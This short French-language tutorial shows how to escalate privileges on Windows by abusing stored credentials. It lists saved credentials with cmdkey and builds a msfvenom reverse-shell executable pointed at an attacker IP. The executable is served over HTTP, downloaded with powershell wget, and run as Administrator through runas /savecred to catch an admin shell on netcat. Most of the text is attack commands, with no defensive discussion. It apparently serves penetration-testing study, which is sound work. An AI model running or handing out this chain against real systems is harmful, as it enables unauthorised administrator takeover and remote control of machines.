Microsoft Windows offre une large gamme d'autorisations et de privilèges précis pour contrôler l'accès aux composants Windows, notamment les services, les fichiers et les entrées de registre. L'exploitation des informations d' identification stockées est une technique pour augmenter les privilèges.

Exploitation

Si un attaquant identifie une entrée d'informations d'identification stockée pour un compte administrateur, il peut opter pour une élévation de privilèges en exécutant un fichier malveillant à l'aide de l'utilitaire runas.

Pour énumérer une liste de tous les noms d'utilisateur et informations d'identification stockés, tapez :

>cmdkey /list

Imaginons qu'on trouve ceci:

Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Créer un exécutable malveillant:

$ msfvenom –p windows/shell_reverse_tcp lhost= <attacker IP> lport= <port d'écoute> –f exe > shel.exe

Puis le mettre dans un serveur http:

$ python –m SimpleHTTPServer 80

Démarrez un netcat dans un nouveau terminal et transférez le shell.exe et exécutez-le à l'aide de la commande suivante.

# Téléchargement du reverse shell
powershell wget <attacker IP>/shell.exe -o shell.exe

# execution du reverse shell
runas /savecred /user:WORKGROUP\Administrator "C:\Users\<username>\Downloads\shell.exe"

Si tout se passe bien, nous devrions avoir reçu la session de l'administrateur sur le netcat précédemment lancé.